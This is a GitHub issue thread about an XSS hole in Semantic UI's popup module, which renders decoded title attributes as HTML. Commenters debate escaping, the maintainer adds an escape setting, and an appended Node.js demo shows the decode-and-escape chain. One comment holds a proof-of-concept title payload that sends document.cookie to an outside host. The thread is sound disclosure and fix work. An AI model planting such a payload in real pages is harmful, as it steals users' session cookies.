[Modules] All module templates should escape unsafe values #1033
I cannot see XSS here... On Sun, Aug 24, 2014 at 2:48 AM, Denis Rechkunov notifications@github.com
Really? I thought my example is very obvious. OK, here is such an example. Craft an XSS link:

<a href="/some/link" class="popup" title="<script>$.get('http://google.com', {data: document.cookie})</script>">Link</a>

Enable popup for this link:

$('.popup').popup()

And now when you hover this link with the mouse cursor your cookies will be sent to google.com.
This is not an XSS... an XSS is only valid if you can send a URL link (direct
In this case the link title is user-generated content that was properly encoded server-side. One more time: the link title has an encoded value that should be safe for any browser-side rendering logic. And popup should use it safely, but it does not.
I agree. If the ability to use arbitrary HTML in these is important, there should be an explicit option (data-title-html, for example). Otherwise it's assumed that title will be applied as text. @KabluBR XSS vulnerabilities can occur any time users impact what is inserted into a page, server side or client side. It doesn't matter where the content comes from.
I understand your problem, just want to be clear that this is not the
Frankie, In the case you have users creating dynamic code do TITLE properties you I am not saying that it cannot also be handled by client side scripts, but http://en.wikipedia.org/wiki/Cross-site_scripting So if you have any js lib that encode any decoded html, you can simply Anyway you can change client script to match your needs too... On Sun, Aug 24, 2014 at 2:34 PM, Frankie Bagnardi notifications@github.com
No need for ad hominem. All comments here were done in good faith. Calling someone's misunderstanding of your technical perspective sad doesn't help resolve an issue, or contribute to the discussion. There is no single attack vector for XSS, and it can be very complicated to handle all possible variations. In general protecting against XSS boils down to some form of string replacement, which can be done anywhere. Rather than try to solve for all possible XSS possibilities in a JS/CSS framework, it's my belief it is better to solve these encoding issues server side. I appreciate your contribution, and I encourage you to continue to submit pull requests if you see other issues when implementing SUI.
Nobody cares that special chars are removed from the title in my example? Please read again all my examples: special chars like Please could you provide an example of how I can output such text in a popup? I am sure there is no such example, because even encoded HTML with safe replacements from the server will be decoded back to HTML by SUI and I see just a rendered link in the popup.
Hi all, sorry Pragmadash if I did look like I was discussing in a bad way. I just wanted to extend this issue as I have already faced it many and many times, to know if it was really a client problem. Anyway, I just tested it and in my browser it does not show the issue you have there.
@KabluBR Please generate the same title value server-side, not just setting it via jQuery.
There is an example on jsFiddle http://jsfiddle.net/pragmadash/0o3p4ghm/11/ that demonstrates the situation with the title attribute rendered server-side with replacements.
@pragmadash they're saying you should double escape it. Not escaped: Escaped: Double escaped:
Exactly, you don't want to fix problems, but you really really don't want to be the cause of them.
Alright, I'll cut this discussion short. The total cost of escaping HTML is a few bytes larger files over-the-wire; there's no harm in including it. JS templating libraries appear to do this by default as a safeguard against XSS. If you're curious, here's Handlebars' exact implementation. I'm going to include this in the @pragmadash You can also specify your own popup, so you don't have to deal with JavaScript construction at all. It's much faster, and avoids issues with unsafe content. See this JSFiddle. You can also use this method to specify complex popup content, like adding grids inside of a popup for a wide dropdown menu.
Added escaped parameters as part of the settings object, can overwrite with a custom function if necessary. See commit for more.

$.fn.popup.settings.templates.escape = function() {
  // my custom escape function
};


Hello, everyone!
We use this awesome Semantic-UI library at our project http://konfettin.ru.
Thanks a lot for your work!
We faced such problem as XSS vulnerability in popups.
For example, we have such element:
If this element is used with the Semantic-UI popup module and the popup is shown, you see an alert. The problem is that when you get the attribute value with
$('selector').attr('title')
it returns decoded HTML and it is not safe to use it without any processing. I've found in the popup docs here that for exactly HTML output in the popup the data-html property should be used; otherwise any developer expects to see safe encoded text.
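Added example, not part of this thread and not Semantic UI's code: the Node.js script below replays, without a browser, the chain that the issue body, Frankie's "title is text unless an explicit option says otherwise" comment and the "double escaped" exchange are all describing. The server escapes the user's title once and emits it in a title attribute; reading the attribute back (what .attr('title') returns) decodes the character references, so the server's escaping is undone; a popup template that drops that value into its markup as HTML exposes the script, while one that escapes it again, unless the element opts in with data-html, does not. Everything here is the example's own: the popup markup, the plain attrs object standing in for element attributes, the constructed sample title, and the attribute decoder, which handles only numeric references and the named ones the escaper emits (a real browser knows the full entity table). The data-html opt-in name comes from the popup docs the issue refers to; Frankie's suggested data-title-html would work the same way.

```javascript
// Added example; not Semantic UI code and not code posted by anyone in this thread.
// It replays the three stages argued over above in plain Node.js, without a DOM:
//   1. the server escapes a user-supplied title once and emits it in title="",
//   2. the browser decodes character references when the attribute is read back,
//      which is the value $('selector').attr('title') returns,
//   3. the popup template either drops that string into its markup as HTML (the
//      behaviour reported in the issue) or escapes it, treating title as text
//      unless the element explicitly opts in with a data-html attribute.

// Minimal escaper for text and double-quoted attribute contexts. The character set
// is the usual one (&, <, >, ", ', `); the entity names are standard HTML.
const ESCAPE_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => ESCAPE_MAP[ch]);
}

// Server side: render the anchor the way a correctly escaping template would.
function serverRenderLink(userTitle, href = '/some/link') {
  return `<a href="${escapeHtml(href)}" class="popup" title="${escapeHtml(userTitle)}">Link</a>`;
}

// Browser side (simulated): the HTML parser decodes character references inside
// attribute values, so the server's single layer of escaping is undone here.
// Handles numeric references and the named ones escapeHtml emits only.
const DECODE_MAP = { amp: '&', lt: '<', gt: '>', quot: '"' };
function decodeAttributeValue(raw) {
  return raw.replace(/&(#x[0-9a-f]+|#\d+|amp|lt|gt|quot);/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      return String.fromCodePoint(parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    return DECODE_MAP[body.toLowerCase()];
  });
}

// What $(a).attr('title') hands back for the rendered anchor: the decoded value.
function readTitleAttribute(anchorHtml) {
  const m = /\btitle="([^"]*)"/.exec(anchorHtml);
  return m ? decodeAttributeValue(m[1]) : null;
}

// Popup template as reported in the issue: the attribute value goes straight into the markup.
function popupUnsafe(title) {
  return `<div class="ui popup"><div class="content">${title}</div></div>`;
}

// Hardened template: title is text unless the element opted in with data-html
// (attrs is a plain object standing in for the element's attributes).
function popupSafe(title, attrs = {}) {
  const content = Object.prototype.hasOwnProperty.call(attrs, 'data-html') ? title : escapeHtml(title);
  return `<div class="ui popup"><div class="content">${content}</div></div>`;
}

// Defender's check for a test suite: after removing the template's own <div> tags,
// any remaining tag opener means user-controlled markup got through.
function containsForeignTag(popupHtml) {
  const withoutTemplate = popupHtml.replace(/<\/?div\b[^>]*>/g, '');
  return /<[a-z!\/?]/i.test(withoutTemplate);
}

// Constructed sample title (not taken from any real site); a bare alert stands in
// for the payload quoted in the thread.
const SAMPLE_TITLE = '<script>alert(1)</script>';

function demo() {
  const once = serverRenderLink(SAMPLE_TITLE);
  const fromAttr = readTitleAttribute(once);                 // decoded: the raw <script> again
  const twice = serverRenderLink(escapeHtml(SAMPLE_TITLE));  // the "double escaped" server output
  return {
    unsafeTemplateLeaks: containsForeignTag(popupUnsafe(fromAttr)),                    // true
    safeTemplateLeaks: containsForeignTag(popupSafe(fromAttr)),                        // false
    optInHtmlLeaks: containsForeignTag(popupSafe(fromAttr, { 'data-html': '' })),      // true
    doubleEscapedSurvives: readTitleAttribute(twice) === escapeHtml(SAMPLE_TITLE),     // true
  };
}

console.log(demo());
```

The doubleEscapedSurvives result is the "double escape" the comments above are pointing at: only when the server escapes twice does the value that comes back out of .attr('title') still carry one layer of escaping, which is why a template that writes the attribute value as HTML needs every producer to know about that convention, whereas a template that escapes by default needs nothing from the server beyond the single escaping it should already be doing.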